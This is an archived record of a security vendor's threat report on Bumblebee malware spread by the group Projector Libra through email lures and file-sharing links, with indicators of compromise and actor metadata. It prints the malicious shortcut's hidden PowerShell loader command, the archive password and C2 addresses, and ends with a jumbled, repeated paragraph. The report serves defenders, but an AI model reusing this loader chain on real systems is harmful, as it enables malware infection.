{ "id": "56b17987-23f0-456d-8090-e0a0536d7fc0", "created_at": "2026-04-06T00:16:32.21978Z", "updated_at": "2026-04-10T03:37:23.841168Z", "deleted_at": null, "sha1_hash": "25af33bb5f05915fcd24c97b36e36ebc22e2a225", "title": "Flight of the Bumblebee: Email Lures and File Sharing Services Lead to Malware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2465030, "plain_text": "Flight of the Bumblebee: Email Lures and File Sharing Services\r\nLead to Malware\r\nBy Brad Duncan\r\nPublished: 2022-08-03 · Archived: 2026-04-05 13:20:35 UTC\r\nExecutive Summary\r\nAmong the threat actors distributing Bumblebee is Projector Libra. Also known as EXOTIC LILY, Projector Libra\r\nis a criminal group that uses file sharing services to distribute malware after direct email correspondence with a\r\npotential victim. Projector Libra has been reported as an initial access broker with ties to Conti ransomware.\r\nThis blog presents a case study from recent Bumblebee malware activity distributed through Projector Libra that\r\nled to Cobalt Strike. Information presented here should provide a clearer picture of the group’s tactics and help\r\nsecurity professionals better defend their organizations against this threat.\r\nPalo Alto Networks customers are protected from Bumblebee with Cortex XDR or our Next-Generation Firewall\r\nwith WildFire and Threat Prevention subscriptions.\r\nFull visualization of the techniques observed, relevant courses of action and IoCs related to this report can be\r\nfound in the Unit 42 ATOM viewer.\r\nPrimary Malware Discussed Bumblebee\r\nPrimary Threat Actors Discussed Projector Libra/EXOTIC LILY\r\nOperating System Affected Windows\r\nRelated Unit 42 Topics Malware, phishing\r\nBumblebee Replaces BazarLoader\r\nBumblebee malware replaced BazarLoader sometime in February 2022. Since then, campaigns that formerly\r\ndistributed BazarLoader are now distributing Bumblebee instead.\r\nBumblebee’s predecessor first appeared as early as April 2020, when developers behind Trickbot released a new\r\nmalware called BazarBackdoor. The loader component of this malware was dubbed BazarLoader, and\r\nBazarLoader was a notable part of our threat landscape throughout 2020 and 2021.\r\nDuring the summer of 2021, BazarLoader reached peak distribution with at least three campaigns pushing the\r\nmajority of samples. These campaigns/threat actors were TA551 (Shathak), TA578 (Contact Forms/Stolen Images\r\nEvidence) and a call center-assisted campaign nicknamed BazarCall.\r\nhttps://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/\r\nPage 1 of 11\n\nBazarLoader remained active through February 2022, but no newly created samples have been discovered since\r\nthen. Starting in March 2022, threat actors like Projector Libra who had been distributing BazarLoader switched\r\nto pushing a new malware family called Bumblebee. Security researchers dubbed this malware Bumblebee\r\nbecause it uses “bumblebee” in the user-agent string generated during post-infection HTTPS traffic.\r\nThreat actors like TA578 previously switched between distributing BazarLoader or distributing IcedID (Bokbot)\r\nmalware. Since March 2022, these threat actors have stopped pushing BazarLoader. For example, TA578 now\r\nswitches between pushing Bumblebee or pushing IcedID.\r\nMalware distribution patterns reveal Bumblebee continues where BazarLoader left off, which includes pushing\r\nfollow-up malware like Cobalt Strike that can eventually lead to a ransomware infection.\r\nTactics of Threat Actor Projector Libra\r\nGoogle’s Threat Analysis Group (TAG) previously presented a full attack chain for this threat actor, but our case\r\nexample begins with the first contact a potential victim receives from this threat actor.\r\nFigure 1. Chain of events for this case study.\r\nIf a potential victim responds to the initial email, Projector Libra sends a reply stating a separate email has been\r\nsent through a file sharing service to provide a file relevant to the discussion. The victim then receives an email\r\ngenerated by the file sharing service. These emails contain a link hosting malware disguised as a file discussed in\r\nthe previous Projector Libra message.\r\nSince 2022, files pushed by Projector Libra have been ISO images. These images are designed to infect a\r\nvulnerable Windows host. They contain a WIndows shortcut, and this shortcut is designed to run Bumblebee\r\nmalware hidden in the same ISO.\r\nIn some cases, the ISO image contains a Windows shortcut (.LNK file) that runs a hidden DLL file for\r\nBumblebee.\r\nhttps://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/\r\nPage 2 of 11\n\nIn other cases, the ISO image contains a Bumblebee DLL contained within a password-protected 7-Zip archive\r\n(.7Z file). In these cases, the LNK file runs a hidden copy of the 7-Zip standalone console to extract Bumblebee\r\nfrom its password-protected 7Z file.\r\nIn an Active Directory (AD) environment, an initial Bumblebee infection leads to Cobalt Strike. Attackers use\r\nCobalt Strike to map the victim’s environment. If the results reveal a high-value target, attackers will attempt\r\nlateral movement and drop ransomware like Conti or Diavol.\r\nExamples of Email Messages\r\nThe first event in our case study is an initial email sent by Projector Libra on May 5, 2022. It spoofs an employee\r\nnamed Andres from a regional gas company in the United States.\r\nFigure 2 shows a screenshot of this initial email.\r\nFigure 2. Email from Projector Libra to establish correspondence.\r\nWhen a potential victim replied to the email shown above in Figure 2, Projector Libra responded with the email\r\nshown below in Figure 3. This response states that a document was sent through TransferXL in a separate email.\r\nhttps://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/\r\nPage 3 of 11\n\nFigure 3. Response from Projector Libra after a potential victim replied to the initial email.\r\nTransferXL is a legitimate file-sharing service with a free tier. It is one of many file sharing services with a free\r\npricing category that are frequently abused by criminal groups like Projector Libra. These TransferXL URLs\r\nexpire after one week, which helps conceal the malware from security researchers. Below, Figure 4 shows a\r\nTransferXL email from this case study sharing malware provided by Projector Libra.\r\nhttps://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/\r\nPage 4 of 11\n\nFigure 4. Email generated by TransferXL sharing malware from Projector Libra.\r\nMalware and Traffic From an Infection\r\nFiles shared through TransferXL are compressed and sent as ZIP archives. Figure 5 shows the TransferXL URL\r\nfrom this case study opened in a web browser and downloading malware provided by Projector Libra.\r\nhttps://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/\r\nPage 5 of 11\n\nFigure 5. TransferXL URL sending malware provided by Projector Libra.\r\nThe recipient extracts an ISO file from the TransferXL ZIP archive. In most GUI-based desktop environments like\r\nMicrosoft Windows, double-clicking an ISO file mounts it as a new drive. In Windows 10, the downloaded ISO\r\nwill mount as a DVD drive, similar to DVD Drive E: in Figure 6.\r\nhttps://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/\r\nPage 6 of 11\n\nFigure 6. Downloaded ISO malware mounted as DVD Drive E: in WIndows 10.\r\nShown above in Figure 6, the downloaded ISO file contains a Windows shortcut named Attachments.lnk. In\r\nMicrosoft Windows, the .lnk file extension remains hidden, even if File Explorer is set to show file extensions.\r\nAttachments.lnk executes a PowerShell command to run a copy of the 7-Zip standalone console file named\r\n7za.exe. Above, Figure 6 displays the full PowerShell command from Attachments.lnk.\r\n7za.exe extracts the Bumblebee malware DLL from a password-protected 7-Zip archive named archive.7z. Both\r\n7za.exe and archive.7z are hidden but can be revealed if File Explorer is configured to show hidden files.\r\nThe extracted Bumblebee DLL file is saved to C:\\ProgramData\\19a.dll, as shown below in Figure 7. The\r\nBumblebee DLL is executed using rundll32 and oxgdXPSGPw as the EntryPoint.\r\nhttps://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/\r\nPage 7 of 11\n\nFigure 7. The extracted Bumblebee malware DLL file saved to disk.\r\nTraffic generated by this infection is all HTTPS. Below, Figure 8 shows the TransferXL URL used for this\r\ninfection filtered in Wireshark. After the ISO was mounted and Bumblebee was executed, we saw Bumblebee\r\nHTTPS C2 traffic on 54.38.139[.]20:443.\r\nFigure 8. Traffic from the infection filtered in Wireshark.\r\nApproximately 15 minutes after Bumblebee C2 traffic began, we saw Cobalt Strike activity using fuvataren[.]com\r\non 45.153.243[.]142:443 as shown below in Figure 9.\r\nhttps://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/\r\nPage 8 of 11\n\nFigure 9. Cobalt Strike traffic seen during the infection.\r\nIn our case example and lab tests, Bumblebee infections frequently led to Cobalt Strike activity. Palo Alto\r\nNetworks Unit 42 has reported Cobalt Strike activity from Bumblebee infections in the following tweets from our\r\n@Unit42_Intel handle on Twitter:\r\nApril 5, 2022\r\nMay 3, 2022\r\nMay 31, 2022\r\nJune 9, 2022\r\nJune 14, 2022\r\nIf the targeted environment is high-value, we might see further activity and possible lateral movement. However,\r\nthis case study did not provide a tempting target, and Cobalt Strike traffic suddenly ended after one hour and 11\r\nminutes.\r\nConclusion\r\nBumblebee is currently distributed by Projector Libra and other threat actors that previously pushed BazarLoader.\r\nProjector Libra runs a sophisticated campaign to establish correspondence with a potential victim before sending\r\nits malware using file sharing services like TransferXL.\r\nMalware from Projector Libra currently consists of ISO images containing Windows shortcuts and hidden files to\r\ninstall Bumblebee malware. Bumblebee is designed to infect Windows hosts. In an AD environment, this\r\nfrequently leads to Cobalt Strike, which can in turn lead to a more serious ransomware infection.\r\nOur case study illustrates how Bumblebee malware from Projector Libra is seen from a victim’s perspective, and\r\nit can help security professionals better understand this threat to protect their organizations.\r\nWindows users can lower their risk from Bumblebee malware through spam filtering, proper system\r\nadministration and ensuring their software is patched and up to date. Palo Alto Networks customers receive further\r\nprotections from Bumblebee through Cortex XDR and our Next-Generation Firewall with WildFire and Threat\r\nPrevention subscriptions.\r\nIf you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident\r\nResponse team or call:\r\nNorth America Toll-Free: 866.486.4842 (866.4.UNIT42)\r\nEMEA: +31.20.299.3130\r\nAPAC: +65.6983.8730\r\nJapan: +81.50.1790.0200\r\nPalo Alto Networks has shared these findings, including file samples and indicators of compromise, with our\r\nfellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their\r\ncustomers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.\r\nhttps://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/\r\nPage 9 of 11\n\nIndicators of Compromise\r\nMalicious ZIP archive downloaded from link in TransferXL email:\r\nSHA256 hash: 58b9a5202a3cc96e86e24cd3c4b797d2efbf7d6b52461eef89b045aa1ff6c6ae\r\nFile size: 1,002,214 bytes\r\nFile location: hxxps://www.transferxl[.]com/download/00jJFzX0NZqb7p?\r\nutm_source=downloadmail\u0026utm_medium=e-mail\r\nNote: The file was available until 2022-05-26, and after that date, it was automatically removed by the file sharing\r\nservice.\r\nISO image extracted from the above zip archive:\r\nSHA256 hash: 9be296fc9b23ad6aed19934123db9c3a2406d544156b7768374e0f9a75eb1549\r\nFile size: 1,333,248 bytes\r\nFile name: SOW_2.iso\r\nContents of the above ISO image:\r\nSHA256 hash: a10291506b884327307ae6d97dd6c043e9f2b6283ca3889dc2f5936fb2357862\r\nFile size: 1,604 bytes\r\nFile name: Attachments.lnk\r\nFile description: Windows shortcut contained in ISO image\r\nShortcut: C:\\Windows\\System32\\cmd.exe /c powershell -WindowStyle Hidden -Command \".\\7za.exe x archive.7z\r\n-pFhu$$57csa -o\\\"c:\\programdata\\\" -y \u003e $null; rundll32 c:\\programdata\\19a.dll,oxgdXPSGPw\r\nSHA256 hash: c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf\r\nFile size: 643,147 bytes\r\nFile name: 7za.exe\r\nFile description: Copy of 7-Zip Standalone Console (not malicious) contained in ISO image\r\nSHA256 hash: e62b9513784ae339351de089dd356742aa1c95971ad8c0cf126f4e72131df96e\r\nFile size: 690,970 bytes\r\nFile name: archive.7z\r\nFile description: Password-protected 7-Zip archive, contains Bumblebee malware DLL\r\nPassword: Fhu$$57csa\r\nSHA256 hash: 024d048f8ce81e8784215dc6cf0e170b02307d9e8624083efdfccaf3e269a0f2\r\nFile size: 1,174,016 bytes\r\nFile location: C:\\ProgramData\\19a.dll\r\nFile description: 64-bit DLL for Bumblebee malware extracted from 7-Zip archive\r\nRun method: rundll32.exe [filename], oxgdXPSGPw\r\nBumblebee C2 Traffic:\r\n54.38.139[.]20:443 - HTTPS traffic\r\nhttps://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/\r\nPage 10 of 11\n\nCobalt Strike C2 Traffic:\r\n45.153.243[.]142:443 - fuvataren[.]com - HTTPS traffic\r\nSource: https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/\r\nhttps://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/\r\nPage 11 of 11\n\nAttachments.lnk executes 7za.exe. Above, Figure a PowerShell 6 displays the full command to run PowerShell command a copy of from the 7-Zip standalone Attachments.lnk. console file named\n7za.exe extracts the Bumblebee malware DLL from a password-protected 7-Zip archive named archive.7z. Both\n7za.exe and archive.7z are hidden but can be revealed if File Explorer is configured to show hidden files.\nThe extracted Bumblebee DLL file is saved to C:\\ProgramData\\19a.dll, as shown below in Figure 7. The\nBumblebee DLL is executed using rundll32 and oxgdXPSGPw as the EntryPoint. \n Page 7 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/" ], "report_names": [ "bumblebee-malware-projector-libra" ], "threat_actors": [ { "id": "26a04131-2b8c-4e5d-8f38-5c58b86f5e7f", "created_at": "2022-10-25T15:50:23.579601Z", "updated_at": "2026-04-10T02:00:05.360509Z", "deleted_at": null, "main_name": "TA551", "aliases": [ "TA551", "GOLD CABIN", "Shathak" ], "source_name": "MITRE:TA551", "tools": [ "QakBot", "IcedID", "Valak", "Ursnif" ], "source_id": "MITRE", "reports": null }, { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "4594f985-865e-4862-8047-2e80226e246a", "created_at": "2022-10-27T08:27:12.984825Z", "updated_at": "2026-04-10T02:00:05.293575Z", "deleted_at": null, "main_name": "EXOTIC LILY", "aliases": [ "EXOTIC LILY" ], "source_name": "MITRE:EXOTIC LILY", "tools": [ "Bazar" ], "source_id": "MITRE", "reports": null }, { "id": "62585174-b1f8-47b1-9165-19b594160b01", "created_at": "2023-01-06T13:46:39.369991Z", "updated_at": "2026-04-10T02:00:03.304964Z", "deleted_at": null, "main_name": "TA578", "aliases": [], "source_name": "MISPGALAXY:TA578", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d1f8bd4e-bcd4-4101-9158-6158f1806b38", "created_at": "2023-01-06T13:46:39.487358Z", "updated_at": "2026-04-10T02:00:03.344509Z", "deleted_at": null, "main_name": "BazarCall", "aliases": [ "BazzarCall", "BazaCall" ], "source_name": "MISPGALAXY:BazarCall", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "52eb5fb6-706b-49c0-9ba5-43bea03940d0", "created_at": "2024-11-01T02:00:52.694476Z", "updated_at": "2026-04-10T02:00:05.410572Z", "deleted_at": null, "main_name": "TA578", "aliases": [ "TA578" ], "source_name": "MITRE:TA578", "tools": [ "Latrodectus", "IcedID" ], "source_id": "MITRE", "reports": null }, { "id": "40b623c7-b621-48db-b55b-dd4f6746fbc6", "created_at": "2024-06-19T02:03:08.017681Z", "updated_at": "2026-04-10T02:00:03.665818Z", "deleted_at": null, "main_name": "GOLD CABIN", "aliases": [ "Shathak", "TA551 " ], "source_name": "Secureworks:GOLD CABIN", "tools": [], "source_id": "Secureworks", "reports": null }, { "id": "90f216f2-4897-46fc-bb76-3acae9d112ca", "created_at": "2023-01-06T13:46:39.248936Z", "updated_at": "2026-04-10T02:00:03.260122Z", "deleted_at": null, "main_name": "GOLD CABIN", "aliases": [ "Shakthak", "TA551", "ATK236", "G0127", "Monster Libra" ], "source_name": "MISPGALAXY:GOLD CABIN", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "56384d06-abc2-4853-8440-db4d7b7d1b5f", "created_at": "2023-01-06T13:46:39.367122Z", "updated_at": "2026-04-10T02:00:03.303733Z", "deleted_at": null, "main_name": "EXOTIC LILY", "aliases": [ "DEV-0413" ], "source_name": "MISPGALAXY:EXOTIC LILY", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "04e34cab-3ee4-4f06-a6f6-5cdd7eccfd68", "created_at": "2022-10-25T16:07:24.578896Z", "updated_at": "2026-04-10T02:00:05.039955Z", "deleted_at": null, "main_name": "TA551", "aliases": [ "G0127", "Gold Cabin", "Monster Libra", "Shathak", "TA551" ], "source_name": "ETDA:TA551", "tools": [ "BokBot", "CRM", "Gozi", "Gozi CRM", "IceID", "IcedID", "Papras", "Snifula", "Ursnif", "Valak", "Valek" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434592, "ts_updated_at": 1775792243, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/25af33bb5f05915fcd24c97b36e36ebc22e2a225.pdf", "text": "https://archive.orkl.eu/25af33bb5f05915fcd24c97b36e36ebc22e2a225.txt", "img": "https://archive.orkl.eu/25af33bb5f05915fcd24c97b36e36ebc22e2a225.jpg" } }